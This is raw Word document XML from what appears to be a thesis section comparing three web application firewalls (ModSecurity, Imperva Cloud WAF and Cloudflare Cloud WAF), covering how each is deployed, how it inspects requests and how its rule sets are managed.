          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Although </w:t>
      </w:r>
      <w:r w:rsidR="00886AF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WAFs behave similarly</w:t>
      </w:r>
      <w:r w:rsidR="005D4F22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, they</w:t>
      </w:r>
      <w:r w:rsidR="00886AF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> are more targeted towards web applications and are mostly effective to traffic passing through OSI layer 7, the application layer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B5501" w14:textId="28FACC17" w:rsidR="000206FB" w:rsidRDefault="00886AF4" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Although WAFs protect mostly on layer 7, they also protect some attacks at layer 6. Many companies also provide add-on services to protect attacks carried out on other layers of the OSI model.</w:t>
      </w:r>
      <w:r w:rsidR="006F1DDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, it is also important to understand that WAF by itself does not block attacks. They rely on implemented rules to block attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD773E" w14:textId="1BE696AC" w:rsidR="00C70591" w:rsidRDefault="009B5211" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Three WAFs were involved in this thesis</w:t>
      </w:r>
      <w:r w:rsidR="00C70591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>; ModSecurity, Imperva’s cloud WAF and Cloudflare’s cloud WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC6E430" w14:textId="1FDC5CE8" w:rsidR="00C53656" w:rsidRPr="000F2B13" w:rsidRDefault="00F466C1" w:rsidP="00F466C1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc71138481"/>
      <w:r>
        <w:t xml:space="preserve">2.3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00C53656" w:rsidRPr="000F2B13">
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="6FB53E83" w14:textId="60BEF302" w:rsidR="00C53656" w:rsidRDefault="009B5211" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ModSecurity is an open-source</w:t>
      </w:r>
      <w:r w:rsidR="009A4491">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, cross-platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> WAF</w:t>
      </w:r>
      <w:r w:rsidR="00076FB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C34BEA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ModSecurity is considered to be an on-premise product</w:t>
      </w:r>
      <w:r w:rsidR="00122C95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and widely recognised as the best open-source WAF available today</w:t>
      </w:r>
      <w:r w:rsidR="00C34BEA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00076FB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> It was first developed by Ivan </w:t>
      </w:r>
      <w:r w:rsidR="00076FB8" w:rsidRPr="00076FB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Ristić</w:t>
      </w:r>
      <w:r w:rsidR="00076FB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, which was released in late 2002.</w:t>
      </w:r>
      <w:r w:rsidR="0030182A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Today, it is under the management of Trustwave Holdings </w:t>
      </w:r>
      <w:r w:rsidR="00EE4A34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>since</w:t>
      </w:r>
      <w:r w:rsidR="0030182A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> it was acquired in 2010.</w:t>
      </w:r>
      <w:r w:rsidR="00431B8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ModSecurity’s WAF was originally designed to support the Apache server and saw a second version of it from 2008. In 2018, ModSecurity version 3.0, also called libmodsecurity supports connectors for Apache and Nginx</w:t>
      </w:r>
      <w:r w:rsidR="005972E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00DB5C77">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SpiderLabs</w:t>
      </w:r>
      <w:r w:rsidR="005972E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, 2021)</w:t>
      </w:r>
      <w:r w:rsidR="00431B8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB81A44" w14:textId="01B5ED07" w:rsidR="00900A9A" w:rsidRDefault="00900A9A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ModSecurity has its own rule configuration language, called SecRules. SecRules are used for filtering HTTP communications, logging and real-time monitoring.</w:t>
      </w:r>
      <w:r w:rsidR="006077A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP ModSecurity Core Rule Set (CRS) is an open-source rule set developed and maintained as part of a project by OWASP that was written in SecRules language. The CRS is commonly deployed with ModSecurity. It is also deployable with any other compatible WAFs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B52DE30" w14:textId="0D3BEC42" w:rsidR="006F1DDA" w:rsidRDefault="00DF57DC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ModSecurity is typically deployed by being installed on a webserver.</w:t>
      </w:r>
      <w:r w:rsidR="00162545">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> It can also be deployed as proxy server which sits in front of server(s) and its web application(s).</w:t>
      </w:r>
      <w:r w:rsidR="004D24E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Incoming and outgoing HTTP traffic would hit ModSecurity first. ModSecurity will then decide how that traffic should be handled, whether it should be allowed to pass, dropped, redirected, etc. This decision is made based on the implemented rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12223DF7" w14:textId="7F20B36B" w:rsidR="00C53656" w:rsidRPr="000F2B13" w:rsidRDefault="00F466C1" w:rsidP="00F466C1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc71138482"/>
      <w:r>
        <w:t xml:space="preserve">2.3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00351CE9">
        <w:t>Imperva Cloud WAF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="7158A8BC" w14:textId="66CE51D7" w:rsidR="00C53656" w:rsidRDefault="005201F5" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>According to Gartner’s Magic Quadrant</w:t>
      </w:r>
      <w:r w:rsidR="00284670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in 2020, Imperva</w:t>
      </w:r>
      <w:r w:rsidR="00442D0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00442D0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">cloud WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>was ranked as a cloud WAF leader and was ranked highest for completeness of vision for the seventh year in a row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313CAE33" w14:textId="2657ABDC" w:rsidR="00442D0F" w:rsidRDefault="00351CE9" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Previously known as Incapsula, Imperva Cloud WAF prides itself in providing enterprise-class protection against most security threats. Being a SaaS model, its consumers only need to manage onboarding their websites or web applications</w:t>
      </w:r>
      <w:r w:rsidR="006A6C8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> onto the platform and manage its configurations</w:t>
      </w:r>
      <w:r w:rsidR="00810F16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, while Imperva manages everything else</w:t>
      </w:r>
      <w:r w:rsidR="006A6C8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68E347" w14:textId="3FC9A084" w:rsidR="000B13F6" w:rsidRDefault="000B13F6" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Imperva’s security rule sets are fully managed by their internal teams. Consumers do not have access to those rules nor do they know about the details of any of the rules.</w:t>
      </w:r>
      <w:r w:rsidR="004A35B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D277E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>However, Imperva claimed that they protect against OWASP top 10 threats, DDoS attacks, hacking attempts, scraping and malicious bots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351FC996" w14:textId="5DF8D5B4" w:rsidR="0051171F" w:rsidRDefault="0051171F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>When a user is trying to access a web application, the traffic will pass through Imperva’s reverse proxy and WAF</w:t>
      </w:r>
      <w:r w:rsidR="004C351F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> which are deployed across the globe through their Content Delivery Network (CDN).</w:t>
      </w:r>
      <w:r w:rsidR="00F75D67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Imperva protects against the threats by inspecting each request that passes through its proxies.</w:t>
      </w:r>
      <w:r w:rsidR="00717A1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00985729">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Imperva Cloud WAF inspects each request at three levels, namely, </w:t>
      </w:r>
      <w:r w:rsidR="00985729">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">connection, structure and request format, and lastly, content. At each level, Imperva Cloud WAF then matches the request against its managed rule sets and patterns. </w:t>
      </w:r>
      <w:r w:rsidR="00DD4039">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Imperva Cloud WAF also profiles the visitor and matches against its database of known client signatures. </w:t>
      </w:r>
      <w:r w:rsidR="00717A1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Malicious traffic would be dropped at this stage, while legitimate traffic would be forwarded to the web server</w:t>
      </w:r>
      <w:r w:rsidR="00962747">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as drawn in Figure 4</w:t>
      </w:r>
      <w:r w:rsidR="00521FD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Imperva, 2020)</w:t>
      </w:r>
      <w:r w:rsidR="00717A1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF30131" w14:textId="761CE89A" w:rsidR="004A35B6" w:rsidRDefault="004A35B6" w:rsidP="001E3FA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7235EB6E" wp14:editId="3CA23E8E">
            <wp:extent cx="5731510" cy="27616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61615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1454E1" w14:textId="641E4B89" w:rsidR="001E3FA5" w:rsidRDefault="001E3FA5" w:rsidP="001E3FA5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc71138522"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00086189">
        <w:t>Traffic through Imperva Cloud WAF (Imperva, 2020)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="5D5C892B" w14:textId="19A93B5E" w:rsidR="00510C94" w:rsidRDefault="00510C94" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">One of Imperva Cloud WAF’s pride lies in its security operations </w:t>
      </w:r>
      <w:r w:rsidR="00020BCB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>centre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> where a dedicated team of security experts and researches work tirelessly to keep its rule sets and database up to date and accurate.</w:t>
      </w:r>
      <w:r w:rsidR="009D4C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> With any new update to its rule sets and database, consumers are not needed to take any action as they are automatically applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C053513" w14:textId="79FDEF20" w:rsidR="00C53656" w:rsidRPr="000F2B13" w:rsidRDefault="00F466C1" w:rsidP="00F466C1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc71138483"/>
      <w:r>
        <w:t xml:space="preserve">2.3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00C53656" w:rsidRPr="000F2B13">
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:r w:rsidR="000F2B13">
        <w:t xml:space="preserve"> Cloud WAF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="4BBCEE9E" w14:textId="0DE19525" w:rsidR="00714386" w:rsidRDefault="00A47FAB" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In the 2021 Garner Peer Insights ‘Voice of the Customer’, Cloudflare’s cloud WAF was recognised as a Customers’ Choice Leader</w:t>
      </w:r>
      <w:r w:rsidR="0095173F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Gartner, 2021)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22236850" w14:textId="698700B6" w:rsidR="00837C29" w:rsidRDefault="00837C29" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloudflare’s cloud WAF prides itself in its managed rule sets which are essential in providing protection against most security threats. Being a SaaS model, its consumers only need to manage onboarding their websites or web applications onto the platform and manage its configurations, while Imperva manages everything else.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3324E6" w14:textId="6DF08C06" w:rsidR="006A6BF5" w:rsidRDefault="006A6BF5" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cloudflare’s rule sets are entirely managed by their internal teams. Today, there are four rule sets that Cloudflare provide for its cloud WAF.</w:t>
      </w:r>
      <w:r w:rsidR="00CD1FAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The four rule sets are Cloudflare Managed Ruleset, Cloudflare Exposed Credentials Check Managed Ruleset, Cloudflare OWASP Core Ruleset and their newest rule set, which is still in beta version, Cloudflare Data Loss Prevention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4038C6A7" w14:textId="035065F9" w:rsidR="009E5E1E" w:rsidRDefault="009E5E1E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloudflare’s cloud WAF works similarly to Imperva’s, where </w:t>
      </w:r>
      <w:r w:rsidR="00C85346">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>traffic passes through Cloudflare’s reverse proxy and WAF which are also deployed globally through its own CDN</w:t>
      </w:r>
      <w:r w:rsidR="007F5022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cloudflare, </w:t>
      </w:r>
      <w:r w:rsidR="00943C00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidR="007F5022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C85346">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005A1B78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each request is inspected a</w:t>
      </w:r>
      <w:r w:rsidR="00CE187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>gainst the rule sets and its threat intelligence.</w:t>
      </w:r>
      <w:r w:rsidR="007F5022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suspicious requests would also be dropped or challenged while legitimate requests get forwarded to the web server</w:t>
      </w:r>
      <w:r w:rsidR="00241E75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figure </w:t>
      </w:r>
      <w:r w:rsidR="00430EAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00241E75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697372C4" w14:textId="32B9F431" w:rsidR="005A1B78" w:rsidRDefault="005A1B78" w:rsidP="00B210B9">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052EBC17" wp14:editId="320DC91D">
            <wp:extent cx="5731510" cy="3439160"/>
            <wp:effectExtent l="0" t="0" r="254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39160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D9D4D1" w14:textId="562891EE" w:rsidR="00B210B9" w:rsidRDefault="00B210B9" w:rsidP="00B210B9">
